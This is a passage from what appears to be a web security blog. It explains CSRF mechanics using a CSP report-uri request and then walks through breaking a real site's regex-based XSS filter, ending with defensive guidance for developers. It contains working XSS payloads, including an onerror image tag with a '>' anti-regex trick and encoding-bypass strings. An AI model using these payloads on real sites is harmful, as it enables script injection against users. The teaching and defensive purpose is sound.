The report-uri creates a POST request to the link. Being able to generate a POST is highly attractive for CSRF attacks. However, the usefulness of this technique is tempered by the fact that it’s not possible to add arbitrary name/value pairs to the POST data. The browser will percent-encode the values for the “document-url” and “violated-directive” parameters. Unless the browser incorrectly implements CSP reporting, it’s a half-successful measure at best.

POST /search?q=deadliest%20web%20attacks%20CSP HTTP/1.1
Host: www.bing.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
Content-Length: 121
Origin: null
Content-Type: application/x-www-form-urlencoded
Referer: http://web.site/HWA/ch3/bing_csp_report_uri.html
Connection: keep-alive

document-url=http%3A%2F%2Fweb.site%2FHWA%2Fch3%2Fbing_csp_report_uri.html&violated-directive=default-src+%27none%27

There’s far more to finding and exploiting CSRF vulnerabilities than covered here. We didn’t mention risk, which in this example is low (there’s questionable benefit to the attacker or detriment to the victim, notice you can even turn history off, and the history feature is presented clearly rather than hidden in an obscure privacy setting). But the Bing example demonstrates the essential mechanics of an attack:

  • A site tracks per-user contexts.
  • A request is known to modify that context.
  • The request can be recreated by an attacker (i.e. parameter names and values are predictable without direct access to the victim’s context).
  • The forged request can be placed on a page unrelated to the site (i.e. in a different Origin) where the victim’s browser comes across it.
  • The victim’s browser submits the forged request and affects the user’s context (this usually requires the victim to be currently authenticated to the site).

Later on, we’ll explore attacks that affect a user’s security context and differentiate them from nuisance attacks or attacks with negligible impact to the user. We’ll also examine the forging of requests, including challenges of creating GET and POST requests. Then we’ll heighten those challenges against the attacker and explore ways to counter CSRF attacks.

Until then, consider who your User Agent is really working for. It might not be who you expect.


“We are what we pretend to be, so we must be careful about what we pretend to be.” — Kurt Vonnegut, Introduction to Mother Night.

A Lesser XSS Attack Greater Than Your Regex Security

I know what you’re thinking. “Did my regex block six XSS attacks or five?” You’ve got to ask yourself one question: “Do I feel lucky?” Well, do ya, punk?

Maybe you read a few HTML injection (cross-site scripting) tutorials and think a regex solves this problem. Maybe. Let’s revisit that thinking. We’ll need an attack vector. It could be a URL parameter, form field, header, or any other part of an HTTP request.

Choose an Attack Vector

Many web apps implement a search functionality. That’s an ideal attack vector because the nature of a search box is to accept an arbitrary string, then display the search term along with any relevant results. It’s the display, or reflection, of the search term that often leads to HTML injection.

For example, the following screenshot shows how Google reflects the search term “html injection attack” at the bottom of its results page. And the text node created in the HTML source.

Google search boxGoogle searchGoogle search html source

Here’s another example that shows how Twitter reflects the search term “deadliestwebattacks” in its results page. And the text node created in the HTML source.

Twitter searchTwitter search html source

Let’s take a look at another site with a search box. Don’t worry about the text (it’s a Turkish site, the words are basically “search” and “results”). First, we try a search term, “foo”, to check if the site echoes the term into the response’s HTML. Success! It appears in two places: a title attribute and a text node.

<a title="foo için Arama Sonuçları">Arama Sonuçları : "foo"</a>

Next, we probe the page for tell-tale validation and output encoding weaknesses that indicate the potential for this vulnerability to be present. In this case, we’ll try a fake HTML tag, “<foo/>”.

<a title="<foo/> için Arama Sonuçları">Arama Sonuçları : "<foo/>"</a>

The site inserts the tag directly into the response. The <foo/> tag is meaningless for HTML, but the browser recognizes that it has the correct mark-up for a self-enclosed tag. Looking at the rendered version displayed by the browser confirms this:

Arama Sonuçları : ""

The “<foo/>” term isn’t displayed because the browser interprets it as a tag. It creates a DOM node of <foo> as opposed to placing a literal “<foo/>” into the text node between <a> and </a>.

Inject a Payload

The next step is to find a tag with semantic meaning for a browser. An obvious choice is to try “<script>” as a search term since that’s the containing element for JavaScript.

<a title="<[removed]> için Arama Sonuçları">Arama Sonuçları : "<[removed]>"</a>

The site’s developers seem to be aware of the risk of writing raw “<script>” elements into search results. In the title attribute, they replaced the angle brackets with HTML entities and replaced “script”  with “[removed]“.

A good hacker would continue to probe the search box with different kinds of payloads. Since it seems impossible to execute JavaScript within a <script> element, we’ll try JavaScript execution within the context of an element’s event handler.

Try Alternate Payloads

Here’s a payload that uses the onerror attribute of an <img> element to execute a function:

<img src="x" onerror="alert(9)">

We inject the new payload and inspect the page’s response. We’ve completely lost the attributes, but the element was preserved:

<a title="<img> için Arama Sonuçları">Arama Sonuçları : "<img>"</a>

So, let’s modify out payload a bit. We condense it to a format that remains valid (i.e. a browser interprets it and it doesn’t violate the HTML spec). This step just demonstrates an alternate syntax with the same semantic meaning.

<img/src="x"onerror=alert(9)>

HTML injection payload

Unfortunately, the site stripped the onerror function the same way it did for the <script> tag.

<a title="<img/src="x"on[removed]=alert(9)>">Arama Sonuçları : "<img/src="x"on[removed]=alert(9)>"</a>

Additional testing indicates the site apparently does this for any of the onfoo event handlers.

Refine the Payload

We’re not defeated yet. The fact that the site is looking for malicious content implies that it’s relying on regular expressions to blacklist common attacks.

Oh, how I love regexes. I love writing them, optimizing them, and breaking them. Regexes excel at pattern matching, but fail miserably at parsing. And parsing is fundamental to working with HTML.

So, let’s unleash a mighty anti-regex hack. I’d call for a drum roll to build the suspense, but the technique is too trivial for that. All we do is add a greater than (>) symbol:

<img/src="x>"onerror=alert(9)>

HTML injection payload with anti-regex

Look what happens to the site. We’ve successfully injected an <img> tag. The browser parses the element, but it fails to load the image called “x>” so it triggers the error handler, which pops up a friendly alert.

<a title="<img/src=">"onerror=alert(9)> için Arama Sonuçları">Arama Sonuçları : "<img/src="x>"onerror=alert(9)>"</a>

alert(9)

Why does this happen? I don’t have first-hand knowledge of the specific regex, but I can guess at its intention.

HTML tags start with the < character, followed by an alpha character, followed by zero or more attributes (with tokenization properties that create things name/value pairs), and close with the > character. It’s likely the regex was only searching for “on…” handlers within the context of an element, i.e. between < and > (the start and end tokens). A > character inside an attribute value doesn’t close the element.

<tag attribute="x>"...onevent=code>

The browser’s parsing model understood the quoted string was a value token. It correctly handled the state transitions between element start, element name, attribute name, attribute value, and so on. The parser consumed each character and interpreted it based on the context of its current state.

The site’s poorly-formed regex didn’t create a sophisticated enough state machine to handle the “x>” properly. (Regexes have their own internal state machines for pattern matching. I’m referring to the pattern’s implied state machine for HTML.) It looked for a start token, then switched to consuming characters until it found an event handler or encountered an end token — ignoring the possible interim states associated with tokenization based on spaces, attributes, or invalid markup.

This was only a small step into the realm of HTML injection. For example, the web site reflected the payload on the immediate response to the attack’s request. In other scenarios the site might hold on to the payload and insert it into a different page. It’s still reflected by the site, but not on the immediate response. That would make it a persistent type of vuln because the attacker does not have to re-inject the payload each time the affected page is viewed. For example, lots of sites have phrases like, “Welcome back, Mike!”, where they print your first name at the top of each page. If you told the site your name was “<script>alert(9)</script>”, then you’d have a persistent HTML injection exploit.

Rethink Defense

For developers:

  • When user-supplied data is placed in a web page, encode it for the appropriate context. For example, use percent-encoding (e.g. < becomes %3c) for an href attribute; use HTML entities (e.g. < becomes &lt;) for text nodes.
  • Prefer inclusion lists (match what you expect) to exclusion lists (predict what you think should be blocked).
  • Work with a consistent character encoding. Unpredictable transcoding between character sets makes it harder to ensure validation filters treat strings correctly.
  • Prefer parsing to pattern matching. However, pre-HTML5 parsing has its own pitfalls, such as browsers’ inconsistent handling of whitespace within tag names. HTML5 codified explicit rules for acceptable markup.
  • If you use regexes, test them thoroughly. Sometimes a “dumb” regex is better than a “smart” one. In this case, a dumb regex would have just looked for any occurrence of “onerror” and rejected it.
  • Prefer to reject invalid input rather than massage it into something valid. This avoids a cuckoo-like attack where a single-pass filter would remove any occurrence of the word “script” from a payload like “<scrscriptipt>”, unintentionally creating a <script> tag.
  • Prefer to reject invalid character code points (and unexpected encoding) rather than substitute or strip characters. This prevents attacks like null-byte insertion, e.g. stripping null from &lgt;%00script> after performing the validation check, overlong UTF-8 encoding, e.g. %c0%bcscript%c0%bd, or Unicode encoding (when expecting UTF-8), e.g. %u003cscript%u003e.
  • Make sure to escape metacharacters correctly.

For more examples of payloads that target different HTML contexts or employ different anti-regex techniques, check out the HTML Injection Quick Reference (HIQR). In particular, experiment with different payloads from the “Anti-regex patterns” at the bottom of Table 2.


Page 71